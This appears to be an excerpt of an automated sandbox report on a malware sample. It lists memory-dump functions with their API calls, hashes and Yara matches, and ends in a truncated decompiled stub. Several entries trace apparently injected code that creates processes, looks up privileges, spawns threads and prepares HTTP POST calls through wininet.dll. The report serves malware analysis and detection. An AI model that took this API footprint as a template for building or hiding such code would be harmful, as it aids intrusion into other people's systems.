                                                                        • Opcode ID: ff4f1d3c3d32fc37067f8ee36b871c362838995b35a2a91b7946c078bf248bb3
                                                                        • Instruction ID: af45c50d43e65b2d2ce1b6ab843e45ba7c3b387a824eb56456371f8c2e6c990c
                                                                        • Opcode Fuzzy Hash: ff4f1d3c3d32fc37067f8ee36b871c362838995b35a2a91b7946c078bf248bb3
                                                                        • Instruction Fuzzy Hash: B7900265211001072115A55B0704527004697DD3D5351C131F500A561CD661D8657161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 867166286dd09b0764312006a8c65692f5a226234462b1d461b955ff75c3e85d
                                                                        • Instruction ID: dae631ac1b9f6a28223511168cc76e5f67a0ebdda26c6fce31c010bfa725b4ee
                                                                        • Opcode Fuzzy Hash: 867166286dd09b0764312006a8c65692f5a226234462b1d461b955ff75c3e85d
                                                                        • Instruction Fuzzy Hash: 1D9002A1202001076115715B4414636400A97E8285B51C131E50095A1DC565D8957165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e35e7eee1f724bd2dc968ef3ea25f89b3af2e594b7d6442a7ed957ba4af523d5
                                                                        • Instruction ID: 10195a9b5d54cf04b484ca811a62cf9e4dbf6d641554e0fe4aab3fad3fff6425
                                                                        • Opcode Fuzzy Hash: e35e7eee1f724bd2dc968ef3ea25f89b3af2e594b7d6442a7ed957ba4af523d5
                                                                        • Instruction Fuzzy Hash: 6E90027120100906F190715B440466A000597D9385F91C125A401A665DCA55DA5D77E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: dffd56c2905f76c08cc2f561acd73202448ca12ef2abfa87beb148799e0ca554
                                                                        • Instruction ID: 17f453f1a4c9681325a2e1d90b557c656507a9418a8f759a9cf278df8541949a
                                                                        • Opcode Fuzzy Hash: dffd56c2905f76c08cc2f561acd73202448ca12ef2abfa87beb148799e0ca554
                                                                        • Instruction Fuzzy Hash: 8490027120504946F150715B4404A66001597D8389F51C121A40596A5D9665DD59B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d9eea4a5efb9ef58cd33e370bbc0de696bcbeae1571f224fa2ab0899904e437e
                                                                        • Instruction ID: cd101a76fa0c9f07cc18e3c5b17ac8c1f2525155b165ac45fbd843fb09fb72c4
                                                                        • Opcode Fuzzy Hash: d9eea4a5efb9ef58cd33e370bbc0de696bcbeae1571f224fa2ab0899904e437e
                                                                        • Instruction Fuzzy Hash: DF90027120108906F120615B840476A000597D8385F55C521A8419669D86D5D8957161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 42473a40009ebeb52bb1b15915d40432c3b9804b3a18372274f388fd68fdb82e
                                                                        • Instruction ID: 8695cc624938584a0e69db281d47e5b9af3d7690c334018b67fc92903cf0e79d
                                                                        • Opcode Fuzzy Hash: 42473a40009ebeb52bb1b15915d40432c3b9804b3a18372274f388fd68fdb82e
                                                                        • Instruction Fuzzy Hash: CF90027120100946F110615B4404B66000597E8385F51C126A4119665D8655D8557561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 675b72903bb688858035e3f7dc43ef61cada39aeea83ee1dae950982ba9a0af2
                                                                        • Instruction ID: 71baaf42da623eca123d709d694a4e8c3ed50c3e45c9d505e1bb6e79c25ee4f3
                                                                        • Opcode Fuzzy Hash: 675b72903bb688858035e3f7dc43ef61cada39aeea83ee1dae950982ba9a0af2
                                                                        • Instruction Fuzzy Hash: 0890027120100506F110659B5408666000597E8385F51D121A9019566EC6A5D8957171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: dbd9584c9e14cbfeac0c1788d86c0d74074866548417aecef33e609ea98851da
                                                                        • Instruction ID: ab6bd539f2516cf0a86d82c3fe91b44780911636de1eb3ffc646fa44a308ca57
                                                                        • Opcode Fuzzy Hash: dbd9584c9e14cbfeac0c1788d86c0d74074866548417aecef33e609ea98851da
                                                                        • Instruction Fuzzy Hash: 3290027131114506F120615B8404726000597D9285F51C521A4819569D86D5D8957162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9d4360831e7ecbfa831661c4add89f97481c376fcdd65b16aa5bf295947faf29
                                                                        • Instruction ID: 3bc4836719af13f8cf4bf223df4a1f27a5815c307fb0e5ba38f9e1f93733c075
                                                                        • Opcode Fuzzy Hash: 9d4360831e7ecbfa831661c4add89f97481c376fcdd65b16aa5bf295947faf29
                                                                        • Instruction Fuzzy Hash: 3690026921300106F190715B540862A000597D9286F91D525A400A569CC955D86D7361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1ea41c5881b82f92d88e6ea0ce6063e75f10842c323bd8acd9606b910806d6b1
                                                                        • Instruction ID: 71eac34a5c35543ef58f8afa778bfdb0b433bf8b75934a0fc4ed35ce0e7c589c
                                                                        • Opcode Fuzzy Hash: 1ea41c5881b82f92d88e6ea0ce6063e75f10842c323bd8acd9606b910806d6b1
                                                                        • Instruction Fuzzy Hash: 6A90027120100517F121615B4504727000997D82C5F91C522A4419569D9696D956B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 641fb9f7ec84cecc23c399618eb2d226d65a4b2a2b15b96ff2c43d02ee63f23c
                                                                        • Instruction ID: 537e50a8da90fa5810de79456b9031f013bc1a7e0db11acff4d9f019c66c1ce3
                                                                        • Opcode Fuzzy Hash: 641fb9f7ec84cecc23c399618eb2d226d65a4b2a2b15b96ff2c43d02ee63f23c
                                                                        • Instruction Fuzzy Hash: 1A900261242042567555B15B44045274006A7E82C5791C122A5409961C8566E85AF661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ed74962d27c763d38bf13a07783f9e5262d6f3ed942c64e9417921b2e67d9007
                                                                        • Instruction ID: 13a6379118870754b863518492e3693e4796b57586f8e50b03e1c72b7ec18ccc
                                                                        • Opcode Fuzzy Hash: ed74962d27c763d38bf13a07783f9e5262d6f3ed942c64e9417921b2e67d9007
                                                                        • Instruction Fuzzy Hash: 659002B120100506F150715B4404766000597D8385F51C121A9059565E8699DDD976A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d80d455c3215c2ee5b9b16aa1d7387798177d4e65d102f2add105fde8051c0ea
                                                                        • Instruction ID: 491cf9bc2908f13e7f12f431628b748e6c0fe1440c31f96a8b1c5ae59844cb92
                                                                        • Opcode Fuzzy Hash: d80d455c3215c2ee5b9b16aa1d7387798177d4e65d102f2add105fde8051c0ea
                                                                        • Instruction Fuzzy Hash: 1E9002A134100546F110615B4414B260005D7E9385F51C125E5059565D8659DC567166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2383b36ada6657a7a5e435c0bb861110c55cbbac054c57af28a556dd0b296a1f
                                                                        • Instruction ID: 4930489b832c411f1faecafd7aac9bf28690145ffd4d818a86d4607fd988cbe6
                                                                        • Opcode Fuzzy Hash: 2383b36ada6657a7a5e435c0bb861110c55cbbac054c57af28a556dd0b296a1f
                                                                        • Instruction Fuzzy Hash: 7F90026121180146F210656B4C14B27000597D8387F51C225A4149565CC955D8657561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00716F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: POST$net.dll$wininet.dll
                                                                        • API String ID: 3472027048-3140911592
                                                                        • Opcode ID: 0a512bb840092b5117ef9aad79243c2ddc55f4cdb56c5b63530f70b0cd998441
                                                                        • Instruction ID: 65ff6bf0f86291a35bedf6efe009bf1ba8a2e3585996f111db8eef26fa1a3af5
                                                                        • Opcode Fuzzy Hash: 0a512bb840092b5117ef9aad79243c2ddc55f4cdb56c5b63530f70b0cd998441
                                                                        • Instruction Fuzzy Hash: 8931D3B5601204ABD710EF68D8A5FEBBBB9EF44300F00811DF6195B281D778A996CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00716F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
                                                                        • Instruction ID: 59113d97f33490edb0264e161f5e794cfcd5d217cc22b7aef5afb6ecbb777a25
                                                                        • Opcode Fuzzy Hash: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
                                                                        • Instruction Fuzzy Hash: 6731A1B5601704ABC725DF68D8A5FA7BBB8FB48700F00841DF61A5B281D734B986CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00703B93), ref: 007184ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 91c959601b3d1ba35e92c6480c27c2ca88a064c4cf33e159cab947f3d9ca6d7b
                                                                        • Instruction ID: b8c523ad9e4707967e8a84b34212659397d5dcd386865069d7548ccfa3a2d8b6
                                                                        • Opcode Fuzzy Hash: 91c959601b3d1ba35e92c6480c27c2ca88a064c4cf33e159cab947f3d9ca6d7b
                                                                        • Instruction Fuzzy Hash: DAF0AF71200204ABDB24EF68DC49EE77768EF85310F004449F9489B382DA34EA51CAE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00703B93), ref: 007184ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction ID: 142f6e160edc7bc8cb98be24844c2a212597b167e955f7e95c62bc50fb748b52
                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction Fuzzy Hash: ADE01AB1200204ABDB14DF59DC49EE777ACAF88750F014554BA0857381CA30E9108AF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007072BA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007072DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                        • Instruction ID: a712b154ea5ecb6caaa6949473aef9e5cd91224134713aaaef0e6c6fe5f5ad42
                                                                        • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                        • Instruction Fuzzy Hash: 8B018432A80228F6E721A6949C47FFE766C6B00B50F150119FF04BA1C2E698690686E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00709B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 6adb1972a6acb26e033f09ec67910a55db4069c3a0423426a45cd6d57385a109
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: 0B010CB5D4020DFBDB10EAE4EC46FDEB3B89B54318F108295AA0897281F635EB55CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00718584
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 32c230bb39e19ae8fc58c34ad0ee724db985e89cf5ded9415f75a2d0e76ee263
                                                                        • Instruction ID: 7a76a37c9655631f18366f330ded0747a840723bbddbb9a1a743ae194b464dec
                                                                        • Opcode Fuzzy Hash: 32c230bb39e19ae8fc58c34ad0ee724db985e89cf5ded9415f75a2d0e76ee263
                                                                        • Instruction Fuzzy Hash: AF01A4B2204108BFCB54CF99DC80EEB77A9AF8C354F158258FA4DD7251C630E851CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00718584
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction ID: 9238b8a67c69dbd2c5f6dd2f64ccb77ace73090b022f487b3876809e28c5fd70
                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction Fuzzy Hash: FA01AFB2210208BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070CF92,0070CF92,?,00000000,?,?), ref: 00718650
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6c15e8501506c95730847b73d40eaf1172a68cf1da89939c31c884e119419ecc
                                                                        • Instruction ID: aeb9d609fdc73819ed592f58d41620f320e6b190acdf89d11c4449642d12a4d1
                                                                        • Opcode Fuzzy Hash: 6c15e8501506c95730847b73d40eaf1172a68cf1da89939c31c884e119419ecc
                                                                        • Instruction Fuzzy Hash: 08F0C2B26041106FCB50DF98D885DEB77A9EF85320B04849AF90C9B253D531EA10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0070CCC0,?,?), ref: 0071703C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                        • Instruction ID: b935b2881a1149b55f61b755ee05671f1f57207b2a71b4aa32a09e08f44d44a2
                                                                        • Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                        • Instruction Fuzzy Hash: F1E065333803143AE33065ADAC03FE7B29C8B81B20F15002AFA0DEA2C1D999F84142A8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070CF92,0070CF92,?,00000000,?,?), ref: 00718650
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 2c54343f3b2b22fe554938122dd5a1a80b980b4a9ea8fcbcdce136ae64afadd2
                                                                        • Instruction ID: 3e49e4573b09e725174175181c925ac78989d274df1c77a292c1bc88b41c66ae
                                                                        • Opcode Fuzzy Hash: 2c54343f3b2b22fe554938122dd5a1a80b980b4a9ea8fcbcdce136ae64afadd2
                                                                        • Instruction Fuzzy Hash: 09E039B1600208ABDB10DF58CC85EDB77AAAF89650F018159FA19AB281C930E9418BE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00713506,?,00713C7F,00713C7F,?,00713506,?,?,?,?,?,00000000,00000000,?), ref: 007184AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: 6b011823d05f09a0203e5b77f6b20a4d9c7a9730793fbbc220dd7669da04bd79
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: 89E012B1200208ABDB14EF99DC45EE777ACAF88650F118558BA085B382CA30F9108AF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070CF92,0070CF92,?,00000000,?,?), ref: 00718650
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: 2b271f6db9e0fbe177697d4b6ffe9a44f72809dc1c1091b34c8455bd01cc476e
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: C5E01AB1200208ABDB10DF49DC85EE737ADAF89650F018154BA0857381C934E9108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00707C63,?), ref: 0070D42B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: fd3911dc95841e804b95e957e7f73ff6612a7f00b66a6a5c8f4df0dfaa5c6347
                                                                        • Instruction ID: 75124203f31f0e1a6acdef5821a209f21258a1bfe7ff3b5785567bcd762daa08
                                                                        • Opcode Fuzzy Hash: fd3911dc95841e804b95e957e7f73ff6612a7f00b66a6a5c8f4df0dfaa5c6347
                                                                        • Instruction Fuzzy Hash: 2EE0C2616803443AEB20AAB89C07FAB2B865F55344F090068F888DB2C3D915D4018610
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00707C63,?), ref: 0070D42B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction ID: a204747563deb48c5e30ca757f40054f14df0719a329c1bce2ad46af334b9816
                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction Fuzzy Hash: 9FD0A7717903047BE710FAE8DC07F6632CD9B44B00F494064F948D73C3E964F9004161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 8ebd1cbfcd860ad335cfcfcd00836ab264f2a891605b8895180b9b81030c0b05
                                                                        • Instruction ID: 4b9088d37006f8d1a018a98b7b9e3dfb85700e65ee5ea896d8c634a962ed8a1a
                                                                        • Opcode Fuzzy Hash: 8ebd1cbfcd860ad335cfcfcd00836ab264f2a891605b8895180b9b81030c0b05
                                                                        • Instruction Fuzzy Hash: B5B09BF19014C5C9F711D7714A08737791077D4745F16C161D2024655A4778D495F6B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 53%
                                                                        			E0482FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                        				void* _t7;
                                                                        				intOrPtr _t9;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr* _t15;
                                                                        
                                                                        				_t13 = __edx;
                                                                        				_push(_a4);
                                                                        				_t14 =  *[fs:0x18];
                                                                        				_t15 = _t12;
